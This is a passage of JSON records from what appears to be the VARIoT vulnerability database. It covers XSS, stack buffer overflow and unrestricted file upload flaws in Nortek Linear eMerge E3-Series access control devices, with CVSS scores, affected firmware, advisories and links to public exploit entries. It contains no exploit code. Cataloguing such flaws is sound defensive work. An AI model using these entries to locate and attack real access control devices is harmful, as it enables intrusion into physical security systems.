"data": "Linear eMerge E3-Series devices allow XSS. Linear eMerge E3 series devices contain a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Nortek Security\u0026ControlLineareMergeE3-Series is an access control device from Nortek Security \u0026 Control. A cross-site scripting vulnerability exists in LineareMergeE3-Series. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7255"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"db": "VULHUB",
"id": "VHN-158690"
},
{
"db": "VULMON",
"id": "CVE-2019-7255"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=47623",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7255"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7255",
"trust": 4.0
},
{
"db": "PACKETSTORM",
"id": "155253",
"trust": 1.8
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-108",
"trust": 0.7
},
{
"db": "EXPLOIT-DB",
"id": "47623",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-21273",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158690",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7255",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"db": "VULHUB",
"id": "VHN-158690"
},
{
"db": "VULMON",
"id": "CVE-2019-7255"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-108"
},
{
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"id": "VAR-201907-0156",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"db": "VULHUB",
"id": "VHN-158690"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21273"
}
]
},
"last_update_date": "2024-03-18T22:23:59.568000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7255"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158690"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.4,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/155253/linear-emerge-e3-1.00-06-cross-site-scripting.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7255"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/47623"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"db": "VULHUB",
"id": "VHN-158690"
},
{
"db": "VULMON",
"id": "CVE-2019-7255"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-108"
},
{
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"db": "VULHUB",
"id": "VHN-158690"
},
{
"db": "VULMON",
"id": "CVE-2019-7255"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-108"
},
{
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158690"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7255"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-108"
},
{
"date": "2019-07-02T19:15:11.087000",
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-21273"
},
{
"date": "2019-11-12T00:00:00",
"db": "VULHUB",
"id": "VHN-158690"
},
{
"date": "2022-10-14T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7255"
},
{
"date": "2024-03-07T07:20:00",
"db": "JVNDB",
"id": "JVNDB-2019-005908"
},
{
"date": "2019-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-108"
},
{
"date": "2022-10-14T01:21:44.847000",
"db": "NVD",
"id": "CVE-2019-7255"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-108"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Cross-site scripting vulnerability in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005908"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-108"
}
],
"trust": 0.6
}
}
VAR-201907-0165
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow a Stack-based Buffer Overflow on the ARM platform. Linear eMerge E3 series devices contain a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security&Control Linear eMerge E3-Series is an access control device from Nortek Security&Control Company in the United States. An attacker could exploit this vulnerability to execute arbitrary code
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0165",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"cve": "CVE-2019-7264",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7264",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-158699",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7264",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7264",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-098",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158699",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2019-7264",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158699"
},
{
"db": "VULMON",
"id": "CVE-2019-7264"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-098"
},
{
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices allow a Stack-based Buffer Overflow on the ARM platform. Linear eMerge E3 series devices contain a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security\u0026Control Linear eMerge E3-Series is an access control device from Nortek Security\u0026Control Company in the United States. An attacker could exploit this vulnerability to execute arbitrary code",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7264"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"db": "VULHUB",
"id": "VHN-158699"
},
{
"db": "VULMON",
"id": "CVE-2019-7264"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7264",
"trust": 3.4
},
{
"db": "ICS CERT",
"id": "ICSA-24-065-01",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU96911165",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005912",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-098",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158699",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7264",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158699"
},
{
"db": "VULMON",
"id": "CVE-2019-7264"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-098"
},
{
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"id": "VAR-201907-0165",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158699"
}
],
"trust": 0.01
},
"last_update_date": "2024-03-18T22:23:59.540000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
},
{
"problemtype": "Buffer error (CWE-119) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-119",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158699"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 1.8,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7264"
},
{
"trust": 0.8,
"url": "https://jvn.jp/vu/jvnvu96911165/"
},
{
"trust": 0.8,
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/787.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158699"
},
{
"db": "VULMON",
"id": "CVE-2019-7264"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-098"
},
{
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158699"
},
{
"db": "VULMON",
"id": "CVE-2019-7264"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-098"
},
{
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158699"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7264"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-098"
},
{
"date": "2019-07-02T17:15:12.007000",
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158699"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7264"
},
{
"date": "2024-03-07T08:30:00",
"db": "JVNDB",
"id": "JVNDB-2019-005912"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-098"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-7264"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-098"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Buffer error vulnerability in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005912"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-098"
}
],
"trust": 0.6
}
}
VAR-201907-0158
Vulnerability from variot - Updated: 2024-03-18 22:23Linear eMerge E3-Series devices allow Unrestricted File Upload. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.
Nortek Security & Control Linear eMerge E3-Series has a code issue vulnerability. An attacker could use this vulnerability to upload a file with an arbitrary extension to a path in the application's Web root directory and execute the file with Web server permissions
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0158",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": "lte",
"trust": 0.6,
"vendor": "nortek",
"version": "\u003c=1.00-06"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34632"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006013"
},
{
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7257"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-106"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7257",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
